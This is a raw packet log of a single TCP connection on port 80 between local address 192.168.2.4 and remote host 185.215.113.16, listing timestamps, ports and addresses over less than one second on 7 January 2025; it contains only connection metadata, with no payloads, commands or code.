Jan 7, 2025 10:08:21.518136978 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518168926 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518177986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518194914 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518203020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518205881 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518254042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518280029 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518284082 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518296003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518312931 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518316984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518337965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518348932 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518402100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518412113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518425941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518430948 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518452883 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518479109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518490076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518548012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518754005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518764019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518781900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518791914 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518801928 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518807888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518831968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518845081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518852949 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518852949 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518867970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518883944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518893003 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518915892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518924952 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518939018 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.519067049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.519185066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.519196033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.519206047 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.519293070 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.519979000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.519989967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520000935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520030022 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520045042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520055056 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520066023 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520071983 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520076990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520093918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520102978 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520106077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520131111 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520139933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520150900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520159960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520175934 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520186901 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520190001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520240068 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520251036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520268917 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520293951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520304918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520322084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520334959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520347118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520359039 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520376921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520389080 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520397902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520404100 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520437002 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520474911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520550966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520560980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520570040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520579100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.520592928 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.520643950 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.570094109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.570108891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.570163012 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.570183992 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.607489109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.607503891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.607572079 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642091990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642115116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642127991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642162085 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642165899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642179012 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642194986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642206907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642209053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642240047 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642257929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642257929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642260075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642273903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642297029 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642323017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642371893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642385006 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642399073 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642436981 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642450094 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642467976 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642494917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642504930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642517090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642524004 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642534971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642539024 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642548084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642585039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642604113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642617941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642625093 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642625093 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642659903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642673969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642689943 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642715931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642728090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642741919 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642743111 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642770052 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642792940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642806053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642849922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642860889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642877102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642884016 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642901897 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642915964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642926931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.642927885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.642927885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643012047 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643078089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643095970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643109083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643120050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643125057 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643127918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643153906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643174887 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643174887 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643297911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643310070 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643327951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643357038 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643357992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643373966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643389940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643400908 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643409967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643439054 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643459082 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643472910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643486977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643487930 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643498898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643517971 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643522978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643553972 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643567085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643610954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643621922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643634081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643640041 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643646002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643672943 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643719912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643743992 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643865108 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643876076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643887043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643933058 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643934965 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.643944979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643956900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643970013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643979073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.643985033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644009113 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.644022942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.644746065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644759893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644772053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644798040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644824982 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.644835949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644848108 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644865036 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.644876957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644887924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644900084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.644901991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644941092 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.644970894 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645015955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645045996 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645076990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645087004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645103931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645113945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645124912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645129919 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645138025 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645149946 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645162106 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645186901 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645256042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645288944 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645288944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645299911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645312071 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645351887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645361900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645379066 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645402908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645414114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645425081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645431995 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645456076 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645463943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645473957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645493031 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645503044 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.645519018 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.645639896 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.694044113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.694065094 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.694075108 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.694086075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.694102049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.694242954 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.741195917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.741209984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.741219044 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.741398096 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767010927 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767138004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767146111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767157078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767204046 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767210960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767221928 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767234087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767239094 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767251015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767255068 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767262936 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767271996 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767291069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767301083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767309904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767321110 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767321110 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767326117 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767390966 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767390966 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767430067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767600060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767611027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767688036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767698050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767708063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767718077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767718077 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767726898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767736912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767736912 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767746925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767755985 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767764091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767774105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767775059 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767786980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767798901 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767807007 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.767823935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767837048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767848015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767915010 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767925978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767935038 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.767942905 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768104076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768114090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768124104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768134117 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768136024 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768143892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768153906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768163919 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768229008 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768238068 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768248081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768265009 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768270969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768291950 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768371105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768381119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768389940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768395901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768403053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768409014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768423080 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768506050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768517971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768517971 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768524885 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768528938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768534899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768632889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768642902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768651962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768661022 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768662930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768676043 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768678904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768688917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768707991 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768737078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768748045 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768758059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768763065 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768776894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768784046 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768788099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768807888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.768827915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768852949 CET	49884	80	192.168.2.4	185.215.113.16
